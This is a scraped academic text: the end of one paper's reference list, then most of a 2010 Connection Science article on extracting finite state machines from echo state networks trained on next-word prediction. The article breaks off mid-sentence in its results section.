http://dx.doi.org/10.1016/j.biopsycho.2007.03.004 http://dx.doi.org/10.1016/j.biopsycho.2007.03.004 http://dx.doi.org/10.1371/journal.pone.0001679 http://dx.doi.org/10.1038/srep00834 http://dx.doi.org/10.1080/02699931.2010.515151 http://dx.doi.org/10.1080/02699931.2010.515151 http://dx.doi.org/10.1080/02699930802204677 http://dx.doi.org/10.1016/j.neuropsychologia.2014.09.022 http://dx.doi.org/10.1016/j.bandc.2009.12.007 http://dx.doi.org/10.1007/s10484-005-4310-0 http://dx.doi.org/10.1007/s10484-005-4310-0 http://link.springer.com/chapter/10.1007%2F978-3-642-24600-5_27 http://link.springer.com/chapter/10.1007%2F978-3-642-24600-5_27 http://dx.doi.org/10.1371/journal.pone.0116492 http://dx.doi.org/10.1371/journal.pone.0116492 http://dx.doi.org/10.1016/j.tsc.2012.04.009 http://dx.doi.org/10.1016/j.tsc.2012.04.009 http://dx.doi.org/10.1002/hbm.20553 http://dx.doi.org/10.7717/peerj-cs.60 Posner J, Russell JA, Peterson BS. 2005. The circumplex model of affect: an integrative approach to affective neuroscience, cognitive development, and psychopathology. Development and Psychopathology 17(3):715–734 DOI 10.1017/S0954579405050340. Rellecke J, Palazova M, Sommer W, Schacht A. 2011. On the automaticity of emotion processing in words and faces: event-related brain potentials evidence from a superficial task. Brain and Cognition 77(1):23–32 DOI 10.1016/j.bandc.2011.07.001. Repantis D, Schlattmann P, Laisney O, Heuser I. 2010. Modafinil and methylphenidate for neuroenhancement in healthy individuals: a systematic review. Pharmacological Research 62:187–206 DOI 10.1016/j.phrs.2010.04.002. Reuderink B, Mühl C, Poel M. 2013. Valence, arousal and dominance in the EEG during game play. International Journal of Autonomous and Adaptive Communications Systems 6(1):45–62 DOI 10.1504/IJAACS.2013.050691. Roth WT. 1983. A comparison of P300 and the skin conductance response. In: Gaillard AWK, Ritter W, eds. Tutorials in ERP research—endogenous components. Amster- dam: North-Holland, 177–199. Russell J. 1980. A circumplex model of affect. Journal of Personality and Social Psychology 39:1161–1178 DOI 10.1037/h0077714. Russell JA, Barrett LF. 1999. Core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. Journal of Personality and Social Psychology 76(5):805–819 DOI 10.1037/0022-3514.76.5.805. Russell JA, Weiss A, Mendelsohn GA. 1989. Affect grid: a single-item scale of plea- sure and arousal. Journal of Personality and Social Psychology 57(3):493–502 DOI 10.1037/0022-3514.57.3.493. Schmidt LA, Trainor LJ. 2001. Frontal brain electrical activity (EEG) distinguishes valence and intensity of musical emotions. Cognition and Emotion 15(4):487–500 DOI 10.1080/02699930126048. Shah C, Erhard K, Ortheil H-J, Kaza E, Kessler C, Lotze M. 2013. Neural correlates of creative writing: an fMRI Study. Human Brain Mapping 34(5):1088–1101 DOI 10.1002/hbm.21493. Shamay-Tsoory SG, Adler N, Aharon-Peretz J, Perry D, Mayseless N. 2011. The origins of originality: the neural bases of creative thinking and originality. Neuropsychologia 49(2):178–185 DOI 10.1016/j.neuropsychologia.2010.11.020. Tomarken AJ, Davidson RJ, Wheeler RE, Doss RC. 1992. Individual differences in anterior brain asymmetry and fundamental dimensions of emotion. Journal of Personality and Social Psychology 62(4):676–687 DOI 10.1037/0022-3514.62.4.676. Tovote P, Fadok JP, Luthi A. 2015. Neural circuits for fear and anxiety. Nature Reviews Neuroscience 16(6):317–331 DOI 10.1038/nrn3945. Van der Werf YD, Van Erp JBF. 2014. Monitoring the physiology of the creative process. In: Spink AJ, Loijens LWS, Woloszynowska-Fraser M, Noldus LPJJ, eds. Proceedings of measuring behavior. Wageningen: Measuring Behavior. Van Erp JBF, Brouwer A-M, Thurlings ME, Werkhoven PJ. 2013. Framework for BCIs in multimodal interaction and multitask environments. In: Towards Practical Brain– Computer Interfaces. Berlin Heidelberg: Springer, 239–250. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 25/26 https://peerj.com http://dx.doi.org/10.1017/S0954579405050340 http://dx.doi.org/10.1016/j.bandc.2011.07.001 http://dx.doi.org/10.1016/j.phrs.2010.04.002 http://dx.doi.org/10.1504/IJAACS.2013.050691 http://dx.doi.org/10.1037/h0077714 http://dx.doi.org/10.1037/0022-3514.76.5.805 http://dx.doi.org/10.1037/0022-3514.57.3.493 http://dx.doi.org/10.1037/0022-3514.57.3.493 http://dx.doi.org/10.1080/02699930126048 http://dx.doi.org/10.1080/02699930126048 http://dx.doi.org/10.1002/hbm.21493 http://dx.doi.org/10.1002/hbm.21493 http://dx.doi.org/10.1016/j.neuropsychologia.2010.11.020 http://dx.doi.org/10.1037/0022-3514.62.4.676 http://dx.doi.org/10.1038/nrn3945 http://dx.doi.org/10.7717/peerj-cs.60 Van Erp JBF, Brouwer A-M, Zander TO. 2015. Editorial: using neurophysiological signals that reflect cognitive or affective state. Frontiers in Neuroscience 9:00193. Van Erp JBF, Lotte F, Tangermann M. 2012. Brain–computer interfaces: beyond medical applications. IEEE Computer 45(4):26–34. Van Erp JBF, Thurlings ME, Brouwer A-M, Werkhoven PJ. 2011. BCIs in multimodal interaction and multitask environments: theoretical issues and initial guidelines. In: Universal Access in Human-Computer Interaction. Users Diversity. Berlin Heidelberg: Springer, 610–619. Van Gerven M, Bahramisharif A, Farquhar J, Heskes T. 2013. Donders machine learning toolbox (DMLT) for Matlab version 26/06/2013. Available at https://github. com/distrep/DMLT . Verona E, Sadeh N, Curtin JJ. 2009. Stress-induced asymmetric frontal brain ac- tivity and aggression risk. Journal of Abnormal Psychology 118(1):131–145 DOI 10.1037/a0014376. Walter H. 2012. Social cognitive neuroscience of empathy: concepts, circuits, and genes. Emotion Review 4(1):9–17 DOI 10.1177/1754073911421379. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 26/26 https://peerj.com https://github.com/distrep/DMLT https://github.com/distrep/DMLT http://dx.doi.org/10.1037/a0014376 http://dx.doi.org/10.1037/a0014376 http://dx.doi.org/10.1177/1754073911421379 http://dx.doi.org/10.7717/peerj-cs.60 work_etgjv3izcvcoxa7feakkgtd764 ---- PLEASE SCROLL DOWN FOR ARTICLE This article was downloaded by: [Universiteit van Amsterdam] On: 25 March 2010 Access details: Access Details: [subscription number 919366406] Publisher Taylor & Francis Informa Ltd Registered in England and Wales Registered Number: 1072954 Registered office: Mortimer House, 37- 41 Mortimer Street, London W1T 3JH, UK Connection Science Publication details, including instructions for authors and subscription information: http://www.informaworld.com/smpp/title~content=t713411269 Sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction Stefan L. Frank a;Henrik Jacobsson b a Institute for Logic, Language and Computation, University of Amsterdam, Amsterdam, GE, The Netherlands b German Research Center for Artificial Intelligence (DFKI), Saarbrücken, Germany First published on: 22 March 2010 To cite this Article Frank, Stefan L. andJacobsson, Henrik(2010) 'Sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction', Connection Science,, First published on: 22 March 2010 (iFirst) To link to this Article: DOI: 10.1080/09540090903398039 URL: http://dx.doi.org/10.1080/09540090903398039 Full terms and conditions of use: http://www.informaworld.com/terms-and-conditions-of-access.pdf This article may be used for research, teaching and private study purposes. Any substantial or systematic reproduction, re-distribution, re-selling, loan or sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. The publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. The accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. The publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused arising directly or indirectly in connection with or arising out of the use of this material. http://www.informaworld.com/smpp/title~content=t713411269 http://dx.doi.org/10.1080/09540090903398039 http://www.informaworld.com/terms-and-conditions-of-access.pdf Connection Science 2010, 1–21, iFirst Sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction Stefan L. Franka * and Henrik Jacobssonb† Institute for Logic, Language and Computation, University of Amsterdam, P.O. Box 94242, 1090 GE, Amsterdam, The Netherlands; bGerman Research Center for Artificial Intelligence (DFKI), Saarbrücken, Germany (Received 31 July 2009; final version received 31 August 2009 ) It has been shown that the ability of echo state networks (ESNs) to generalise in a sentence-processing task can be increased by adjusting their input connection weights to the training data. We present a qualitative analysis of the effect of such weight adjustment on an ESN that is trained to perform the next-word prediction task. Our analysis makes use of CrySSMEx, an algorithm for extracting finite state machines (FSMs) from the data about the inputs, internal states, and outputs of recurrent neural net- works that process symbol sequences. We find that the ESN with adjusted input weights yields a concise and comprehensible FSM. In contrast, the standard ESN, which shows poor generalisation, results in a massive and complex FSM. The extracted FSMs show how the two networks differ behaviourally. More- over, poor generalisation is shown to correspond to a highly fragmented quantisation of the network’s state space. Such findings indicate that CrySSMEx can be a useful tool for analysing ESN sentence processing. Keywords: echo state networks; sentence processing; rule extraction; finite state machines 1. Introduction Echo state networks (ESNs; Jaeger 2001, 2003) have recently gained popularity as a recurrent neural network (RNN) model for time-series processing. The great advantage of ESNs over the more traditional recurrent networks, such as the simple recurrent network (SRN; Elman 1990), is that the weights of their input and recurrent connections remain fixed at their initial random values. Only the output connection weights are trained, which can be done very efficiently by linear regression, without the need for any iterative gradient-descent method (such as the well-known backpropagation algorithm) for finding proper weights. Although ESNs have been shown to be useful for several applications, attempts to use them for modelling sentence processing in the field of cognitive science have resulted in mixed outcomes. Whereas one experiment (Tong, Bickett, Christiansen, and Cottrell 2007) showed ESNs to perform *Corresponding author. Email: S.L.Frank@uva.nl †Present address: Google, Zurich, Switzerland (since October 2008). ISSN 0954-0091 print/ISSN 1360-0494 online © 2010 Taylor & Francis DOI: 10.1080/09540090903398039 http://www.informaworld.com D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 2 S.L. Frank and H. Jacobsson at least as well as SRNs in a next-word prediction task, others (Čerňanský and Tiňo, 2007; Frank 2006a) have found ESNs to generalise relatively poorly. One way of increasing an ESN’s ability to generalise is by adding a hidden layer in-between the recurrent and output layers (Frank 2006a, b). Unfortunately, this also adds another set of connection weights to train, doing away with network’s efficient trainability. Alternatively, ESN generalisation can be improved by adjusting the input connection weights to the training input. As shown by Čerňanský, Makula, and Beňušková (2008) and Frank and Čerňanský (2008), this can be done efficiently by one-shot, unsupervised learning. The resulting network can then be trained on the target output just like any ESN, but with greatly increased ability to generalise. In this paper, we analyse the difference between two types of networks: the standard ESN with random input weights and the alternative network with adjusted input weights (as mentioned above). Following Frank and Čerňanský (2008), we call the latter model ESN+. Both networks are trained on the next-word prediction task in sentence processing. Comparisons between the network’s performance on sentences that differ markedly from the training sentences, reported by Frank and Čerňanský, showed that ESN+ generalises much better than does ESN. Here, we extend this quantitative comparison with a qualitative analysis of networks’ behaviour and of the structure of their state spaces. This is done by applying the CrySSMEx algorithm (Jacobsson 2006a) for extracting finite state machines (FSMs) from network’s input symbols, recurrent-layer states, and output symbols. In this way, the difference between ESN and ESN+ becomes apparent not only from their performance levels, but also from the extracted FSMs, which allows for a more detailed look into the behaviour of the networks. Moreover, the quantisation of the networks’ state spaces into FSM states, as computed by CrySSMEx, provides insight into the underlying cause of the networks’ divergent abilities to generalise. The next section describes the CrySSMEx algorithm. Following this, we present details of our simulations: the language on which the networks were trained and tested, the architecture of the networks, and the difference between ESN and ESN+. Section 4 shows the FSMs that were extracted from the two networks, as well as the corresponding state-space quantisations, at least to the extent that this turned out to be feasible. These results are interpreted and discussed in Section 5. 2. Analysing recurrent neural networks A fundamental problem for qualitative analyses of RNNs is that even small networks can form complex dynamical systems. Given a single problem instance and a fixed network topology, a wide range of unique behaviours may result from training the network. Understanding each network’s idiosyncratic behaviour can take a lot of effort. Alternatively, a statistical analysis (i.e., over populations of RNNs) could be performed. Such an analysis is usually not preferred, however, because the networks’ individual characteristics are typically lost. Countless analysis methods have been developed in parallel with new RNN algorithms and architectures (for a brief list, see Jacobsson 2005). In most cases, trained network instances are analysed on the basis of their hidden activations (e.g., Elman 1990). However, the analysis often requires deep, or even complete knowledge of the domain itself. As a typical and excel- lent example of this, Bodén and Wiles (2000) used several tools to analyse, quantify, and group qualitatively different RNNs. The networks were trained on context-free and context-sensitive formal languages. Since the RNNs were fed long monotonous sequences, their behaviours were largely governed by the dynamics near the fixed points of the state space. The analy- sis took advantage of this by using the properties of the eigenvalues of the Jacobian matrix near the fixed point as a basic taxonomy. The analysis was complemented with state-space D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 3 plots, which was only feasible because the number of state nodes was limited to two. Although the results were interesting (showing previously unknown regularities in the dynamics of the RNNs), they could only be obtained because the authors defined the domain precisely and (pre- sumably) knew what they were looking for. Moreover, the network’s dynamics was visually accessible. 2.1. Rule extraction from recurrent neural networks As discussed above, many researchers employ an analysis method that is tailored for the specific network and domain under investigation. This form of ad hoc analysis is perhaps the most common, and may also be necessary to uncover the specifics of the solutions implemented through RNNs; solutions that may very well be counterintuitive and interesting in many ways. However, one class of analysis methods, rule extraction, represents a broader and more generic approach to the problem of neural network analysis and has become a research field in its own right (Andrews, Diederich, and Tickle 1995; Jacobsson 2005). These techniques are typically developed to be portable and as widely applicable as possible (i.e., independent of network type and domain). The quality of a rule extractor is typically measured by (adapted from Andrews et al. 1995): rule accuracy, in terms of how well the rules perform on the test set; rule fidelity, that is, how well the rules mimic the behaviour of the RNN; and rule comprehensibility, roughly corresponding the readability of the extracted rules and/or the size of the rule set. Existing techniques for extracting rules (represented as FSM) from RNNs were surveyed by Jacobsson (2005). It turned out that, despite a great deal of diversity, all algorithms have four constituents in common: (1) Quantisation of the continuous state space of the RNN (e.g., by self-organising maps or k-means), resulting in a discrete set of states. (2) Generation of internal states and outputs by feeding input patterns to the RNN. (3) Construction of rules from the observed state transitions, usually resulting in deterministic automata. (4) Minimisation of the rule set, using some standard algorithm (see Hopcroft and Ullman 1979). As argued by Jacobsson (2005), none of the existing techniques attempted to merge these four parts in any principled manner. For example, the surveyed techniques implemented the state-space quantisation through standard techniques, completely independent from machine minimisation, even though many clustering algorithms are based on merging of clusters that are equivalent (Mirkin 1996), in a manner much like the merger of computationally equivalent states by the FSM minimisation algorithms. Moreover, rule-extraction techniques could typically only be suc- cessfully applied to low-dimensional networks (up to three dimensions). In fact, basic plots of the state space were often more informative than the extracted machines themselves. 2.2. CrySSMEx A basic problem when using standard clustering algorithms for quantising the state space of an RNN, or of any other dynamical system, is that the state space should not primarily be treated as Euclidean space: since the state of an RNN governs its current and future behaviour, small distances in the state space may have a large impact on the functioning of the network, whereas large state-space distances may only affect the network minimally. The algorithm we use here, CrySSMEx (the Crystallising Substochastic Sequential Machine Extractor)1 (Jacobsson 2006a), D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 4 S.L. Frank and H. Jacobsson does not suffer from this problem because it takes into account the dynamical rather than static geometric properties of the state space. 2.2.1. Finite state machine extraction The CrySSMEx algorithm (outlined in Algorithm 1) is based on the combination of the above- mentioned four constituents. As an RNN operates on training or test data, CrySSMEx extracts a probabilistic FSM given the network’s input, internal states, and outputs. These data (denoted � in Algorithm 1) are sampled while the network processes sequences of inputs, as it does during training or testing. Starting with a single-state FSM, CrySSMEx iteratively adjusts the FSM by splitting and merging states (i.e., changing the quantisation of the RNN’s state space), until the FSM is fully deterministic. CrySSMEx(�) Input: Time-series data, �, containing a sequence of input symbols, output symbols, and state vectors generated by the RNN when processing test data Output: A deterministic machine M mimicking the RNN (if successful) begin Let M be the stochastic machine based on � resulting from an unquantized state space (i.e. only one state); repeat Select state vectors from � corresponding to indeterministic states in M; Update the state quantiser by splitting the RNN state space according to selected data; Create M using new state quantiser; if M has equivalent states then Merge equivalent states; end until M is deterministic (success) or the number of iterations exceeds a predefined limit ; return M; end Algorithm 1 A simplified description of the main loop of CrySSMEx. M is created from the sequence of observed RNN inputs, outputs, and states contained in � by quantisation of the state space. This quantisation is iteratively refined, resulting in a sequence of increasingly accurate FSMs being extracted. In each iteration, the current FSM’s ‘weakest’ points, which are its most non-deterministic states, are targeted for improvement by actively selecting the corresponding RNN states as the data to be used for refining the quantisation. The algorithm also keeps the extracted model minimal by merging regions in the state space that correspond to states that are computationally equivalent in the FSM. It was shown (Jacobsson 2006a; Jacobsson, Frank, and Federici 2007) that CrySSMEx can efficiently extract probabilistic (or, in favourable circumstances, deterministic) FSMs from RNNs trained on deeply embedded grammars (anbn), high-dimensional RNNs (103 internal nodes), ESNs, and chaotic systems. Moreover, the algorithm was successfully adapted to extract either Moore- or Mealy-type machines (Jacobsson et al. 2007). In a Mealy machine, the output of the network and the extracted machine is defined over transitions between states. In a Moore machine, on the other hand, the output is defined as a function of the current state and input (Hopcroft and Ullman 1979). Depending on the domain and network, either Moore or Mealy models will be D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 5 more compact and/or comprehensible. For the current application, we chose to extract Moore machines, since these correspond more closely to the ESNs, whose output is indeed a function of the current state and input. 2.2.2. State-space quantisation To merge and split the state space, CrySSMEx creates a number of simple vector quantis- ers, arranged hierarchically in a graph (Figure 8 in Section 4.3 shows an example). Each split corresponds to a node in the graph, describing how the state space is separated into increasingly smaller regions. The algorithm that creates this arrangement of quantisers was called the Crystalline Vector Quantiser (CVQ) in Jacobsson (2006a). Roughly speaking, it generates the so-called CVQ graph by creating enough simple vector quantisers to split the state space properly. Consequently, the number of required quantisers is inversely proportional to the quality of their operation for the data set under investigation. The vector quantiser in Jacobsson (2006a) was chosen to be simple and parameter-free, showing that the extracted machines were not impaired by an inappropriate choice of underlying quantisers. However, this quantiser is very sensitive to outliers or skewed distributions, typically making the resulting CVQ graph size larger than would be implied by the number of iterations of CrySSMEx alone. 2.2.3. Scaling properties Prior to CrySSMEx, rule extraction from RNNs had only been applied to networks with just a handful of internal units. Whether rule extraction is feasible depends of course on the network’s size, but even more strongly so on its dynamics: a chaotic network with just one unit requires more FSM states than a very large but non-chaotic network (for a deeper discussion of this issue, see Jacobsson 2006a). CrySSMEx can easily handle much larger and more chaotic networks because it generates a sequence of stochastic FSMs that form increasingly precise approximations of the network’s behaviour. If obtaining a full (i.e., deterministic) FSM description of the network is not feasible, the algorithm can be stopped after any iteration, yielding an FSM that may at least be sufficiently complete. Moreover, since CrySSMEx currently (and quite deliberately) uses very simple vector quantisation for analysing the networks’ state space, it is reasonable to assume that the algorithm’s scaling properties could be further improved by using optimised algorithms (e.g., support vector machines). However, an investigation of this issue is beyond the scope of the current paper. It is less clear how well CrySSMEx scales up when the number of input and output symbols increases. The problem is essentially one of data scarcity: in every state there will be many possible input symbols for which a prediction needs to be modelled. How to deal with this is an open issue, but as argued elsewhere (Jacobsson 2006b), one could try an active learning approach in which the extraction algorithm interacts with the network directly to gather more data when needed. 3. Method This section presents the methodological details of our simulations. First, in Section 3.1, we present the language processed by the networks, as well as the specific division into two distinct sets of sentences: those used for training and those used for testing. As explained in Section 3.2, two ESNs were trained to predict the upcoming word at each point in a sentence. That section also D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 6 S.L. Frank and H. Jacobsson explains how prediction performance is assessed, and how the networks’ outputs are discretised for CrySSMEx analysis. 3.1. The language 3.1.1. Lexicon The semi-natural language used by Frank and Čerňanský (2008) has a lexicon of 26 words, containing 12 plural nouns (e.g., girls, boys), 10 transitive verbs (e.g., chase, see), two prepositions (from and with), one relative clause marker (that), and an end-of-sentence marker denoted [end], which is also considered a word. The nouns are divided into three groups: female nouns (e.g., women), male nouns (e.g., men), and animal nouns (e.g., bats). As explained below, this distinction is only relevant for distinguishing between training and test sentences. Since the language has only syntax and no semantics, the names of words within each syntactic category are irrelevant and only provided to make the sentences more readable. 3.1.2. Grammar Sentences are generated by the grammar in Table 1. The simplest sentences, such as mice love cats [end], are just four words long, but longer sentences can be constructed by adding one or more prepositional phrases or relative clauses. Relative clauses come in two types: subject-relative clauses (SRCs, as in mice that love cats…) and object-relative clauses (ORCs, as in mice that cats love…). Since SRCs can themselves contain a relative clause (as in mice that love cats that dogs avoid [end]), there is no upper bound to sentence length. 3.1.3. Training and test sentences We adopted not only the language used by Frank and Čerňanský (2008), but also their division of sentences into subsets used for training and testing. The common approach is to set aside a random sample of possible inputs, and train only on the remaining sentences. However, Frank and Čerňanský’s specific goal was to investigate whether ESNs can generalise to sentences that contain words occurring at positions they did not occupy during training.2 Therefore, specific groups of sentences were withheld during training, such that some nouns only occurred in particular grammatical roles: male nouns were banned from subject position and female nouns did not occur in the object position (Table 1 shows which positions are considered to hold subject nouns Table 1. Probabilistic context-free grammar of the language. S → NPsubj V NPobj [end] NPr → Nr (0.7) | Nr SRC (0.06) | Nr ORC (0.09) | Nr PPr (0.15) SRC → that V NPobj ORC → that Nsubj V PPr → from NPr | with NPr Nr → Nfem | Nmale | Nanim Nfem → women | girls | sisters Nmale → men | boys | brothers Nanim → bats | giraffes | elephants | dogs | cats | mice V → chase | see | swing | love | avoid | follow | hate | hit | eat | like Variable r denotes a noun’s grammatical role (subject or object). The prob- abilities of different productions are equal, except for NP, where they are given in parentheses. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 7 and which hold object nouns). The resulting training set consisted of 5000 sentences, with an average length of 5.93 words. Frank and Čerňanský (2008) tested networks on eight different types of sentences, but we will restrict our qualitative analysis to just one of these. The test set consisted of all 2700 sentences with structure ‘Nmale V Nfem that Nmale V [end]’. That is, all test sentences had one ORC, which modified the second noun. Note that animal nouns do not occur in test sentences, and that the roles of male and female nouns are reversed compared with training sentences: male nouns are in the subject position whereas female nouns are objects. This means that all test sentences differ quite strongly from the training sentences. The first word of a test sentence is always a male noun, which never occurred in the sentence-initial position during training. This makes generalisation to test sentences much more challenging than would have been the case if training sentences had been selected by an unrestricted random sample. 3.2. The echo state networks 3.2.1. Architecture We investigated the behaviour of two ESNs, with identical architectures. As shown in Figure 1, words are represented locally on the 26-unit input layer that feeds activation to a recurrent layer, which is called the ‘dynamical reservoir’ (DR) as is common in the ESN literature. The DR also receives its own activation in the previous time step and feeds activation to the output layer. The output layer, like the input layer, has 26 units, each representing one word. Input. If the word i forms the input to the ESN at time step t , the input activation vector ain(t) = (a1, . . . , a26) has ai (t) = 1 and aj (t) = 0 for all j �= i. The weights of connections from input units to the DR are collected in the 100 × 26 input weight matrix Win. In most ESNs, these weights are chosen randomly, but here we use a different approach in which the input weights depend on the training data. In the ESN+ model, most inputs weights are 0, but for DR-units j = 1, . . . , 26, the weight of the connection from input unit i to DR-unit j equals wj,i = 2N × N (i, j ) + N (j, i) N (i)N (j ) , Figure 1. Architecture of ESN(+). Weights of connections between DR units (Wdr ; solid arrow) are random and fixed; weights of connection from DR to output units (Wout ; dotted arrow) are adapted to training data and task; weights of connections from input to DR units (Win ; dashed arrow) are random and fixed in ESN, but adapted to training data in ESN+. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 8 S.L. Frank and H. Jacobsson where N is the number of word tokens in the training data, N (i) is the number of times the word i occurs in the training data, and N (i, j ) is the number of times the word j directly follows i. We adopted this particular approach from Frank and Čerňanský (2008), who used it because it was found by Bullinaria and Levy (2007) to yield the word representations that could be successfully applied to several syntactic and semantic tasks. Moreover, it is extremely simple, allowing for fast computation of the input weights. Choosing Win in this manner results in the encoding of syntactic category information in the input weights. If we take column vector i of Win (i.e., the weights of connections emanating from input unit i) to represent word i, it turns out that representations of words of the same category cluster together. As Figure 2 shows, there is a clear separation between nouns, verbs, prepositions, that, and [end]. In spite of the distinctive roles of female, male, and animal nouns in the training sentences, these three groups of nouns are more similar to one another than to other syntactic categories.3 This increases ESN+ performance on test sentences because words within a syntactic category are equivalent according to the grammar of Table 1 (see Frank and Čerňanský 2008, for a comprehensive discussion). ESN+ is compared with a standard ESN, that is, one with random input weights. However, a fair comparison between the two networks requires that the ESN’s input weights are at least distributed similarly to those of ESN+. For this reason, the ESN’s input weights wj,i (for j = 1, . . . , 26) are a random permutation of the corresponding weights of ESN+. For j > 26, the ESN’s input weights are 0, as in ESN+. Note that this does away with the syntactic information present in Win, while making sure that the distribution of input weights is the same for ESN and ESN+. Dynamical reservoir. The two networks, ESN and ESN+, have identical DRs. It has 100 units, connected to each other with weights collected in the 100×100-matrix Wdr . The DR is sparsely connected in that 85% of the values in Wdr are 0. All other values are taken randomly from a uniform distribution centred at 0, after which they are linearly rescaled such that the spectral radius of Wdr (i.e., its largest eigenvalue) equals 0.95. 5101520253035 dogs mice bats cats elephants giraffes sisters men brothers boys women girls [end] from with chase avoid follow eat see bump love like swing hit that Figure 2. Hierarchical cluster analysis of word representation vectors (i.e., input weights). D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 9 The DR’s activation vector at time step t , denoted adr(t) ∈ [0, 1]100, is computed at each time step by adr(t) = fdr(Wdr adr(t − 1) + Winain(t)), (1) where adr(t − 1) is the DR state in the previous time step (with adr(0) = 0.5 at the beginning of each sentence) and fdr is the logistic function. Output. The weights of connections from DR units to the 26 outputs are collected in the 26 × 100 matrix Wout . Each output unit i also receives a bias activation bi . The output at time step t equals aout(t) = fout (Wout adr(t) + b), (2) where b is the vector of bias activations and fout is the softmax function: fi,out(x) = exi∑ j exj , (3) due to which the outputs are positive and sum to 1, making aout a probability distribution. That is, the output value aout,i (t) is the network’s estimate of the probability that the word i will be the input at time step t + 1. 3.2.2. Network training As explained by Jaeger (2001), useful output connection weights and biases, Wout and b, are easy to find without any iterative training method. Ideally, a 26 × (N − 1) target matrix U = (u(1), u(2), . . . , u(N − 1)) is constructed, where each column vector u(t) has a value of 1 at the single element corresponding to the input word at t + 1, and all other elements are 0. That is, the vector u(t) forms the correct prediction of the input at t + 1. Next, the complete training sequence (excluding the last word) is run through the DR, according to Equation (1). The resulting vectors adr(t) are collected in a 101 × (N − 1)-matrix A. The connection weight matrix and bias vector are now computed by Wout = f−1out(U)A+, b = f−1out(U)1, (4) where A+ is the pseudoinverse of A, and 1 is an (N − 1)-element column vector consisting of 1s. An obvious problem with this method is that the softmax function (Equation (3)) does not have an inverse f−1out , and even if it did, the values 0 and 1 would be outside the inverse domain. In the past, this problem was avoided by either applying a less efficient training method that does not involve f−1out (Frank 2006a, b), or by taking fout to be the identity function. In the latter case, the resulting aout does not form a probability distribution, so an additional transformation is needed to remove negative values and make sure the activations sum to 1 (Čerňanský and Tiňo 2007, 2008; Čerňanský et al. 2008; Frank and Čerňanský, 2008). Here, we do take fout to be the softmax function and train the network using Equation (4). This is possible because, although fout has no inverse in general, a proper f −1 out(u) does exist for particular target vectors u. In our case, each u = (u1, . . . , un)T has one element uc arbitrarily close to 1, whereas all other elements have an arbitrarily small but positive value � < n−1 (where n is the number of words in the language, that is, n = 26 here). As derived in Appendix 1, the inverse D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 10 S.L. Frank and H. Jacobsson softmax in that case equals: f −1 i,out(u) = { ln(�−1 − n + 1) if i = c, 0 if i �= c. We take � = 0.01, making f −1c,out(u) = ln(75) ≈ 4.317. 3.2.3. Network analysis Prediction performance. Since the grammar of the language is known, the true probability of occurrence of each word at each point in the sentence can be computed. The prediction perfor- mance of the networks is rated by comparing their output vectors, which can be interpreted as probability distributions over words, to the true distributions according to the grammar of Table 1. More precisely, we take the Kullback–Leibler divergence from the output distribution to the true distribution as a measure for the network’s prediction error. Extracting FSMs. Extracting an FSM from an RNN requires symbolic input and output, since an FSM’s transitions and states come with a finite set of unique labels. The network inputs in our simulations represent words, so denoting them by symbols is straightforward. The networks’ outputs, however, are not symbols but probability distributions. These continuous-valued vectors need to be discretised into symbols before CrySSMEx can be applied. The particular choice of output symbols is very important for the analysis. In the extreme case that all network outputs are given the same label, the resulting machine will have only one state and be completely uninformative. In contrast, choosing an output discretisation that is too fine-grained yields ‘bloated’ and incomprehensible FSMs. Therefore, the granularity of the discretisation should be fine enough for the symbols to be meaningful, but no finer than required for the issue under investigation. Here, we make use of the fact that all words within each of the five syntactic categories (noun, verb, preposition, that, and [end]) are equivalent according to the language’s grammar (Table 1). This means that syntactic categories are just as meaningful as words, making a descretising of output vectors into words overly fine-grained. We therefore turn these vectors into symbols corresponding to the five syntactic categories. This is done by summing the activations of all output units representing words from the same category. The category with the highest total activation (i.e., the most probable one) is considered to be the output symbol of the network. Summing over words of a category does not give unfair advantage to the categories with many words (such as the nouns) over those with few words (such as the single-word category ‘relative clause marker’). This is because, if some noun is possible according to the grammar, any noun is possible. Therefore, the network needs to spread the total probability mass for ‘nouns’ over all individual nouns, whereas the total probability of the ‘relative clause marker’ goes to the single output unit representing the word that. 4. Results 4.1. Network performance The networks’ prediction error on test sentences is shown in the left panel of Figure 3. As expected, ESN+ does better than the standard ESN. This is true in particular at the sentence-final verb, that is, when having to predict [end]. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 11 0 1 2 3 4 test sentences K L − d iv e rg e n ce b o ys lik e g ir ls th a t m e n se e [e n d ] 0 1 2 3 4 training sentences g ir ls lik e th a t se e [e n d ] b o ys w o m e n ESN ESN+ Figure 3. Prediction error of ESN and ESN+ at each word of test sentences (left) and training sentences with the same structure (right). Results are averaged over sentences; the ones shown on the x-axes are just examples. Eleven of the 5000 